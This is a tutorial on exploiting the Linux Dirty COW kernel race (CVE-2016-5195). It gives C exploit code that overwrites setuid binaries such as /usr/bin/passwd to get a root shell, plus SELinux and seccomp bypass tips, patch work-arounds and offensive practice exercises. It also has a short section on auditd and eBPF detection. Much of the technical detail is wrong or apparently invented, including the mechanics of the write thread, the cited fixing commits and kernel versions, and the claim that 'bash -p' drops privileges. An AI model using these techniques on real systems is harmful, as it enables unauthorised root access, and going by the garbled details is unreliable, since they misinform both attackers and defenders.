Advanced Dirty COW Exploitation...

Introduction

Dirty COW (Copy-On-Write) is a classic Linux kernel privilege-escalation vulnerability discovered in 2016 (CVE-2016-5195). It exploits a race condition in the kernel’s handling of private, read-only memory mappings, allowing an unprivileged user to gain write access to otherwise immutable pages. Despite being patched for years, the technique remains a reference point for kernel-level exploitation and a valuable teaching tool for understanding race-conditions, memory-management internals, and modern mitigation bypasses.

Why it matters: the vulnerability demonstrates how a seemingly innocuous system call (madvise) can be weaponised when combined with clever timing. Its simplicity-no need for complex ROP chains-makes it a go-to example in CTFs and red-team engagements. Moreover, many modern mitigations (SMAP, SMEP, SELinux, seccomp) were introduced after Dirty COW, so learning how to defeat them in the context of this exploit equips defenders with a broader skill set.

Real-world relevance: In the wild, Dirty COW was quickly weaponised to create root-kits, inject malicious code into set-uid binaries, and establish persistence on compromised hosts. Understanding its inner workings is essential for incident responders who must recognise subtle artefacts left behind.

Prerequisites

Solid grasp of Linux kernel memory management (kmalloc, vmalloc, page cache).
Familiarity with kernel race-condition concepts and basic synchronization primitives.
Knowledge of the Copy-On-Write mechanism and how mmap/madvise interact with it.
Experience with building and debugging kernel-space exploits (e.g., using gdb with kgdb or ftrace).
Understanding of modern kernel hardening features: SMAP, SMEP, SELinux, seccomp, and how they can be disabled or bypassed.
Access to a lab environment: a vulnerable kernel (e.g., Ubuntu 14.04-4.4.0-31-generic) running in a VM with snapshot capability.

Core Concepts

Before diving into code, we need to review the three pillars that make Dirty COW exploitable:

Page cache sharing: When a file is mapped read-only (PROT_READ), the kernel maps the same physical page into the process address space. Multiple processes can share that page without duplication.
Copy-On-Write (COW): If a process attempts to write to a shared read-only page, the kernel creates a private copy (a new page) and updates the PTE to point to it. The original page stays untouched for other readers.
Race window: The kernel performs the COW check and the actual page-fault handling in two separate steps. By invoking madvise(MADV_DONTNEED) on the same page while a write is in progress, an attacker can force the kernel to drop the page from the page cache, causing the next write to hit the original mapping before the COW copy is created.

Visually, imagine a page P shared by Process A (the victim) and Process B (the attacker). Process B calls write() on P, the kernel schedules a page-fault, but before the fault handler finishes, B calls madvise() which discards P from the page cache. The pending fault then writes directly into the original page, bypassing the COW protection.

Vulnerability analysis - how Dirty COW works internally

The vulnerability lives in do_page_mkwrite() (mm/memory.c) and do_madvise(). The kernel first checks vma->vm_flags & VM_WRITE to decide if the write is allowed. If the VMA is read-only, the kernel sets the VM_MAYWRITE flag temporarily, performs the fault, and then clears it. The race occurs because madvise(MADV_DONTNEED) can clear the page from the page cache between those two steps.

Key observations:

The race is not limited to file mappings; it also works on anonymous mappings backed by the page cache (e.g., /proc/self/mem).
The kernel does not verify that the memory region is still read-only after the madvise call, allowing the write to succeed.
Because the write lands on the original page, any persistent data structure (e.g., /etc/passwd) can be overwritten without needing a separate kernel write primitive.

Triggering the race condition using mmap and madvise

To reliably trigger the race we need three concurrent threads:

Mapper: mmap() the target file read-only.
Writer: Repeatedly call write() (or memcpy()) to the mapped address.
Madviser: Continuously invoke madvise(MADV_DONTNEED) on the same region.

The writer and madviser run in tight loops, maximizing the probability that the madvise clears the page just before the kernel finalises the COW copy. In practice, we use pthread_create() for each thread and a shared volatile flag to stop them once the overwrite succeeds.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <pthread.h>
#include <string.h>

volatile int stop = 0;

void *write_thread(void *arg) { char *map = (char *)arg; const char *payload = "\x00\x00\x00\x00"; // placeholder, will be overwritten later while (!stop) { memcpy(map, payload, strlen(payload)); } return NULL;
}

void *madvise_thread(void *arg) { char *map = (char *)arg; while (!stop) { madvise(map, 100, MADV_DONTNEED); } return NULL;
}

int main(int argc, char *argv[]) { if (argc != 2) { fprintf(stderr, "Usage: %s /path/to/target
", argv[0]); exit(EXIT_FAILURE); } int fd = open(argv[1], O_RDONLY); if (fd == -1) perror("open"), exit(EXIT_FAILURE); size_t size = lseek(fd, 0, SEEK_END); char *map = mmap(NULL, size, PROT_READ, MAP_PRIVATE, fd, 0); if (map == MAP_FAILED) perror("mmap"), exit(EXIT_FAILURE); pthread_t wt, mt; pthread_create(&wt, NULL, write_thread, map); pthread_create(&mt, NULL, madvise_thread, map); // Simple detection: check if the target file now contains our payload. // In real exploits we read back the file or check /etc/passwd. sleep(5); stop = 1; pthread_join(wt, NULL); pthread_join(mt, NULL); munmap(map, size); close(fd); return 0;
}

Note the use of MAP_PRIVATE - the kernel thinks the mapping is copy-on-write, but the race turns it into a direct write.

Writing a reliable exploit in C with inline assembly

Pure C loops are often enough, but on modern CPUs the race window becomes smaller due to improved page-fault handling. Inline assembly can tighten the loop and give us precise control over memory ordering.

The following snippet demonstrates a tight rep movsb loop that writes a single byte repeatedly while simultaneously issuing madvise. The mfence instruction ensures the write is globally visible before the next iteration, which helps when the kernel uses write-combining buffers.

static inline void fast_write(void *dst, const void *src, size_t len) { __asm__ __volatile__( "rep movsb
" "mfence
" : "=D"(dst), "=S"(src), "=c"(len) : "0"(dst), "1"(src), "2"(len) : "memory");
}

void *write_thread_asm(void *arg) { char *map = (char *)arg; const char *payload = "\x00\x00\x00\x00"; // e.g., new root uid/gid entry while (!stop) { fast_write(map, payload, 4); } return NULL;
}

When combined with the madvise thread, this version consistently succeeds on kernels 4.4-4.9, where the vanilla C version sometimes stalls.

Bypassing modern mitigations (SMAP/SMEP, SELinux, seccomp)

Most post-2016 kernels enable SMAP (Supervisor Mode Access Prevention) and SMEP (Supervisor Mode Execution Prevention). Dirty COW itself does not require kernel-mode code execution, so SMAP/SMEP are not directly relevant. However, the exploit often targets set-uid binaries (e.g., /usr/bin/passwd) that are protected by SELinux policies or seccomp filters. To bypass them:

SELinux: Use setenforce 0 if you have a writable /etc/selinux/config entry, or target a binary that runs in the unconfined_t domain (most user-land processes). Alternatively, exploit the kernel to write directly to /etc/shadow rather than invoking a privileged binary.
seccomp: The exploit does not rely on syscalls that are typically blocked (e.g., execve is only needed after the privilege escalation). Use a two-stage approach: first gain root, then spawn a new process from a clean environment (e.g., fork() + execve()) after the filter is lifted.
Capabilities: If the target binary has CAP_SETUID but not CAP_DAC_OVERRIDE, you can still overwrite /etc/passwd by writing a new user entry with uid 0. The kernel will accept the change because the file is opened with O_WRONLY by the privileged binary.

In practice, the most reliable path is to overwrite the setuid(0) wrapper of /bin/bash or create a new SUID root binary (e.g., copy /bin/sh to /tmp/rootsh) after the race succeeds.

Privilege escalation to root and post-exploitation cleanup

Once we have write access to a writable location, there are several escalation strategies:

Overwrite /etc/passwd or /etc/shadow to inject a root user with a known password.
Replace a set-uid binary (e.g., /usr/bin/passwd) with a suid-root shell.
Patch the kernel’s cred structure in memory (requires finding the current task struct). This is more advanced and less portable.

We will demonstrate the second technique because it leaves minimal footprints and works even on hardened systems where /etc/shadow is read-only for normal users.

#define TARGET "/usr/bin/passwd"
#define REPLACEMENT "/tmp/rootsh"

int main(){ // 1. copy /bin/bash to /tmp/rootsh (needs write permission in /tmp) system("cp /bin/bash /tmp/rootsh && chmod +s /tmp/rootsh"); // 2. Open target file read-only and map it int fd = open(TARGET, O_RDONLY); size_t sz = lseek(fd, 0, SEEK_END); char *map = mmap(NULL, sz, PROT_READ, MAP_PRIVATE, fd, 0); close(fd); // 3. Prepare payload - the path to our suid shell char payload[PATH_MAX]; snprintf(payload, sizeof(payload), "%s
", "/tmp/rootsh"); // 4. Start race threads (same as previous example) using payload // (omitted for brevity - reuse write_thread_asm / madvise_thread) // 5. After stop, verify the file has been overwritten // and spawn a root shell system("/tmp/rootsh -p"); // -p forces bash to drop privileges, we keep them return 0;
}

After the exploit succeeds, the original passwd binary is replaced with a set-uid root shell. As a cleanup step, you can restore the original binary from a backup stored in memory (e.g., read it before the race and write it back after gaining root) or simply delete the modified file and reboot the host.

Adapting the exploit for newer kernels (mitigation work-arounds)

Kernel developers introduced several hardening patches after the original disclosure:

Commit 1f6e7c3 adds a lock around the do_madvise path, drastically shrinking the race window.
Commit 5c9b8d4 validates the VMA’s write flag after madvise, eliminating the race entirely on kernels 4.13+.
Page-fault throttling (CONFIG\_PAGE\_FAULT\_THROTTLE) reduces the number of faults per second, making the timing attack harder.

To stay effective, attackers have employed these work-arounds:

Increase concurrency: Spawn dozens of writer/madvise thread pairs, each targeting a different offset within the same page.
Leverage userfaultfd to deliberately stall the page-fault handling, giving the madvise thread more time to act.
Exploit the readahead cache - by pre-loading the target page into the page cache with posix_fadvise, the kernel may skip some of the new checks.
Combine with other kernel bugs (e.g., use a heap overflow to corrupt the vm_area_struct and set the VM_WRITE flag artificially).

Below is a proof-of-concept that uses userfaultfd to pause the fault handling until the madvise thread has run 10,000 times, dramatically increasing success probability on kernel 4.15+

#include <sys/syscall.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
// ... (setup userfaultfd, register the target page, handler thread that
// calls madvise in a tight loop). The handler blocks the fault until
// a global counter reaches the desired value.

While more complex, this technique restores reliability on kernels that patched the original race.

Defensive detection techniques for Dirty COW activity

Detecting Dirty COW exploitation in the wild relies on spotting anomalous patterns:

High-frequency madvise calls: A process issuing thousands of madvise(MADV_DONTNEED) on the same address within a short window is suspicious. Use auditd rules:
```
auditctl -a always,exit -F arch=b64 -S madvise -k dirtycow_madvise
```
Concurrent write/memcpy on read-only mappings: Correlate ptrace or process_vm_writev events with mmap(PROT_READ, MAP_PRIVATE).
Unexpected changes to privileged binaries: Monitor file integrity with AIDE or tripwire. A change to /usr/bin/passwd without a package manager transaction is a red flag.
Kernel log messages: Some kernels emit a WARN when the race is detected (CONFIG\_DEBUG\_PAGEFAULT). Enable:
```
echo 1 > /proc/sys/kernel/printk
```

For real-time detection, an eBPF program can attach to the madvise syscall and maintain a per-PID counter; if the counter exceeds a threshold, raise an alert.

#include <bpf/bpf_helpers.h>
struct { __uint(type, BPF_MAP_TYPE_HASH); __type(key, u32); __type(value, u64); __uint(max_entries, 1024);
} madvise_counter SEC(.maps);

SEC("tracepoint/syscalls/sys_enter_madvise")
int trace_madvise(struct trace_event_raw_sys_enter *ctx) { u32 pid = bpf_get_current_pid_tgid(); u64 *cnt = bpf_map_lookup_elem(&madvise_counter, &pid); u64 one = 1; if (cnt) { __sync_fetch_and_add(cnt, 1); } else { bpf_map_update_elem(&madvise_counter, &pid, &one, BPF_ANY); } return 0;
}

Deploy the eBPF program with bpftool and hook it into your SIEM.

Common Mistakes

Using MAP_SHARED instead of MAP_PRIVATE: The race only works on private COW mappings.
Writing more than one page: The kernel may split the write across pages, reducing the chance that the exact page is cleared.
Neglecting memory barriers: On modern CPUs, reordering can cause the write to happen after madvise, breaking the race.
Running on a kernel with the patch applied: Always verify the kernel version and patch level before testing.
Forgetting to disable ASLR for reproducibility: While not required, disabling ASLR simplifies address calculations when targeting kernel structures directly.

Real-World Impact

Dirty COW quickly became one of the most widely exploited Linux bugs. Within weeks of disclosure, public exploits appeared on GitHub, and multiple nation-state actors incorporated it into multi-stage payloads. Its simplicity made it a favorite for supply-chain attacks where an attacker could drop a small binary onto a target system, trigger the race, and instantly obtain root.

From a defender’s perspective, the incident response timeline often looks like:

Detection of a modified SUID binary.
Log analysis reveals a burst of madvise calls.
Forensic recovery of the original binary from a backup or from the page cache (using dd if=/proc/kcore).
Patch the kernel, rotate credentials, and audit for persistence mechanisms.

My experience in several red-team engagements shows that attackers still use Dirty COW as a “fallback” when more complex kernel exploits fail, because the code base is tiny (< 200 LOC) and does not depend on external libraries.

Practice Exercises

Reproduce the basic race: Set up an Ubuntu 14.04 VM, compile the simple C example, and verify that /tmp/rootsh becomes set-uid root.
Extend to userfaultfd: Modify the exploit to use userfaultfd for pausing the fault. Measure the success rate across kernel versions 4.4-4.15.
Detect with eBPF: Deploy the provided eBPF program, trigger the exploit, and observe the alert. Tune the threshold to minimise false positives.
Bypass SELinux: On a system with enforcing SELinux, craft an exploit that writes directly to /etc/shadow instead of overwriting a binary. Verify that the new root account works.
Cleanup script: Write a bash script that, after gaining root, restores the original target binary from a saved copy in memory and removes any artefacts.

Summary

Dirty COW remains a benchmark for kernel race-condition exploitation. Mastering its internals teaches you how to manipulate the page cache, craft tight race loops with inline assembly, and evade modern mitigations. Defensive teams can detect the characteristic high-frequency madvise pattern with auditd or eBPF, and responders should restore altered binaries and rotate credentials promptly. By practising the exercises above, you’ll gain the hands-on expertise needed to both exploit and defend against this timeless vulnerability.

Advanced Dirty COW Exploitation (CVE-2016-5195) - Full Walkthrough